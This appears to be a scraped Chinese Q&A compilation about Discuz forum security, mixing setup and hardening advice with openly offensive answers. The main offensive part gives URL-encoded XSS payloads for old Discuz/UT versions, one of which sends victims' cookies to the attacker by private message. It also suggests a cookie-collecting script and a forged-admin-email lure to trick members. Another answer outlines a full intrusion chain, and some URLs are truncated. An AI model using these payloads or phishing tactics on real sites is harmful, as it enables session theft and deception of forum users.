怎样入侵Windows8 kali Linux

入侵windows服务器，这个很简单，方法很多，第一:看网站网站类型(discuz,eshop等)找漏洞，SQL注入，XSS，等 第二：进后台，传马，IIS解析漏洞，提权，进服务器。 第三进入服务器后再提取。

至于Linux一般用到msf渗透测试，nmap,nc ,exp等。

dz论坛如何防止cc攻击

CC攻击，也是流量攻击的一种，CC就是模拟多个用户（多少线程就是多少用户）不停地进行访问那些需要大量数据操作（就是需要大量CPU时间）的页面，造成服务器资源的浪费，CPU长时间处于100%，永远都有处理不完的连接直至就网络拥塞，正常的访问被中止。而CC攻击基本上都是针对端口的攻击，以上这两种攻击基本上都属于硬性流量的攻击.

如果服务器（网站）被入侵了,一般都是服务器或者网站存在漏洞，被黑客利用并提权入侵的，导致服务器中木马，网站被挂黑链，被篡改，被挂马。解决办法：如果程序不是很大，可以自己比对以前程序的备份文件，然后就是修复，或者换个服务器，最好是独立服务器。也可以通过安全公司来解决，国内也就Sinesafe和绿盟等安全公司 比较专业.

我在本地搭建了一个Discuz论坛 请问该怎样做才能让别人访问到我的网站？

建设你注册个域名，购买个虚拟空间上传到网络，这样比你在本地搭建要好方便 的多了，在本地搭建有太多的弊端，如你的主机的安全、访问的不便利等，

目前动网论坛的漏洞有那些？如何利用这些漏洞入侵动网？

在discuz！的发贴、回贴、PM等中的subject都没有经过过滤，所以也可以添加代码。 例如 http://xxx/post.php?action=newthreadfid=2...cript%3E%3Cb%22 效果是首先弹出自己的cookie 利用方法：把上述代码放置到img中。 适用版本：discuz！2.x discuz！3.x 一种利用discuz！2.0漏洞进行欺骗获得cookie的尝试 通过测试XXXFan论坛的PM功能存在一个安全漏洞，具体描述如下： XXXFan的给某个会员发送悄悄的链接如下（假定这个会员名字为XXXFan） http://XXX/pm.php?action=sendusername=XXXFan 因为论坛程序对会员名字没有进行过滤，而是直接显示在发送到栏目中（TO：），所以可以在名字后面加上script代码。例如 http://XXX/pm.php?action=sendusername=XXXFan "scriptalert(documents.cookie)/scriptb%20" 上面的链接点击以后首先弹出的是自己的cookie内容。 当然我们可以先在自己的站点上构造一个程序来收集cookie，类似于 getcookie.php?cookie= 但是如何来诱使会员点击呢，如果简单的放在论坛上，太容易被识别。所以可以利用discuz论坛程序的另外一个功能，"帖子介绍给朋友"功能。 因为discuz的这个功能对填写的emial地址没有进行任何过滤、辨别和模版，可以伪造任何人给别人发信，安全性很高。利用这个功能我们就可以伪造ExploitFan的管理员给某个会员发一封信，诱使会员点击我们准备的URL，如果诱使就看自己的手段了，例如可以说"论坛正在测试新功能，请您协助点击上面地址，我们会在后台记录您的点击在合适的时间会给您增加积分以做奖励"等等。 因为链接地址是XXXFan的，而且发信人和邮件地址都是XXXFan的官方地址，所以可信度非常高，而且不会留下任何把柄。当然为了更高的安全性，可以在script里的内容加密，以进一步增加隐蔽性。 至于得到cookie如何做，可以尝试cookie欺骗或者是暴力破解MD5密码 本方法适用于大部分使用discuz2.0的论坛,至于discuz3.0的利用方法请参与在我以前发表的discuz！悄悄话漏洞 【BUG】Discuz!投票的BUG 投票可以用 misc.php?action=votepollfid=2tid=16980pollanswers[]=n （n为选项，从0开始） 的方式通过URL来直接投票 但是如果n最大选项呢，嘻嘻～ 照样提交成功，不过增加了一个标题为空的选项 效果见： http://discuz.net/viewthread.php?tid=20020sid=dymPEc （那个最后的空白的是我刚加的） 该漏洞存在的版本： Discuz!3.X Discuz!2.X(可能，没有测试过） Discuz!的代码漏洞 这是接着昨天发现的漏洞所展开的，第一发现者（PK0909)。 具体的描述就不说了，下面是一个简单的测试代码。 /Article/UploadFiles/200412/20041225232318260.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22MSXML2.XMLHTTP%22);Req.open(%22post%22,%22 http://www.XXXX.com/forum/pm.php?action=send%22,false);var%20forms=%22pmSubmit=Submit%22.toLowerCase()%2B%22%26msgto=XXXXX%26subject=cookie%26saveoutbox=0%26message=%22%2Bescape(documents.cookie);Req.setRequestHeader(%22Content-length%22,forms.length)%3BReq.setRequestHeader(%22CONTENT-TYPE%22,%22application/x-www-form-urlencoded%22);Req.send(forms);%3c/script%3e%3cb%22 [ /img] 发现discuz！UT 跨域站点的脚本漏洞－－短消息篇有关跨域站点的脚本漏洞，已经算是非常平成并普遍的漏洞了。 有关具体的消息可以参阅： http://www.cert.org/advisories/CA-2000-02.html 下面针对Discuz、UT论坛程序的悄悄话部分加以说明 漏洞适应版本： Discuz1.X Discuz!2.0(0609,0820版) Discuz!3.X UT 1.0 漏洞描述： discuz！给指定会员发送悄悄话使用的是类似 http://www.XXXX.net/phpbbs/pm.php?action=sendusername=name 的语句，但是name没有经过过滤直接显示在发送短消息的页面中，这就给偷cookie或者更严重的破坏打开了方便之门。 Discuz!3.X已经改为 http://XXX.net/pm.php?action=senduid=XXXX 类似的语句，避免了这个漏洞，但是在选择短信文件夹的时候却没有经过过滤。同样产生了上面的漏洞 例 http://www.XXXX.net/phpbbs/pm.php?action=s...dusername=name %22%3E%3Cscript%3Ealert(documents.cookie)%3C/script%3E%3Cb%22[/URL] ，上面的例子是显示自己的cookie。（针对Discuz!1.X Discuz!2.X) http://XXX.net/pm.php?folder=inbox%22%3E%3...cript%3E%3Cb%22 显示自己的cookie。（针对Discuz!3.X) UT虽然在主题上经过了过滤，也就是说把%27转换为'；但是其收件人却没有过滤，所以同样有类似的漏洞。例子略。(在不同的UT论坛上发现其代码不尽相同，但是总的来说都有类似的漏洞）

希望采纳

Discuz，X-Discuz论坛有哪些入侵渗透手段

既然是手段，当然就是把那些常见的入侵手法写出来，具体操作什么的，给出实例，现在大多数都是基于web的渗透，sql注入，xss跨站脚本，include包含，upload上传，服务器配置不严等等，拿到权限后利用本地溢出提权，抓hash，扫弱口令等扩大战果等等，网上资料都很多，多利用baidu，google搜索一下就有了，最好再给出自己的见解

Discuz!系统论坛如何设置才可以强制用户必须登录才可以进入网站？

进入后台=》用户=》用户组=》系统用户组，把游客的权限都设成否

进入后台=》板块=》板块管理在各版块点击编辑，点权限相关，把游客的浏览权限设成否

希望可以帮到你。

discuz论坛，怎么维护网站安全，怎么判断是否被攻击和挂木马？

一般都是网站程序存在漏洞或者服务器存在漏洞而被攻击了

网站挂马是每个网站最头痛的问题，解决办法：1.在程序中很容易找到挂马的代码，直接删除，或则将你没有传服务器的源程序覆盖一次但反反复复被挂就得深入解决掉此问题了。但这不是最好的解决办法。最好的方法还是找专业做安全的来帮你解决掉

听朋友说 SineSafe 不错 你可以去看看。

清马+修补漏洞=彻底解决

所谓的挂马，就是黑客通过各种手段，包括SQL注入，网站敏感文件扫描，服务器漏洞，网站程序0day, 等各种方法获得网站管理员账号，然后登陆网站后台，通过数据库 备份/恢复 或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容，向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP，然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时，你就会自动的访问被转向的地址或者下载木马病毒

清马

1、找挂马的标签，比如有script language="javascript" src="网马地址"/script或iframe width=420 height=330 frameborder=0

scrolling=auto src=网马地址/iframe，或者是你用360或病杀毒软件拦截了网马网址。SQL数据库被挂马，一般是JS挂马。

2、找到了恶意代码后，接下来就是清马，如果是网页被挂马，可以用手动清，也可以用批量清，网页清马比较简单，这里就不详细讲，现在着重讲一下SQL数据库清马，用这一句语句“update 表名 set 字段名=replace(字段名,'aaa','')”， 解释一下这一句子的意思：把字段名里的内容包含aaa的替换成空，这样子就可以一个表一个表的批量删除网马。

在你的网站程序或数据库没有备份情况下，可以实行以上两步骤进行清马，如果你的网站程序有备份的话，直接覆盖原来的文件即可。

修补漏洞（修补网站漏洞也就是做一下网站安全。）

1、修改网站后台的用户名和密码及后台的默认路径。

2、更改数据库名,如果是ACCESS数据库，那文件的扩展名最好不要用mdb，改成ASP的，文件名也可以多几个特殊符号。

3、接着检查一下网站有没有注入漏洞或跨站漏洞，如果有的话就相当打上防注入或防跨站补丁。

4、检查一下网站的上传文件，常见了有欺骗上传漏洞，就对相应的代码进行过滤。

5、尽可能不要暴露网站的后台地址，以免被社会工程学猜解出管理用户和密码。

6、写入一些防挂马代码，让框架代码等挂马无效。

7、禁用FSO权限也是一种比较绝的方法。

8、修改网站部分文件夹的读写权限。

9、如果你是自己的服务器，那就不仅要对你的网站程序做一下安全了，而且要对你的服务器做一下安全也是很有必要了！

怎么进入discuz论坛后台

网站域名地址/admin.php，将其放到浏览器地址栏，回车，即可访问。

访问之后需要使用管理员账号进行登录。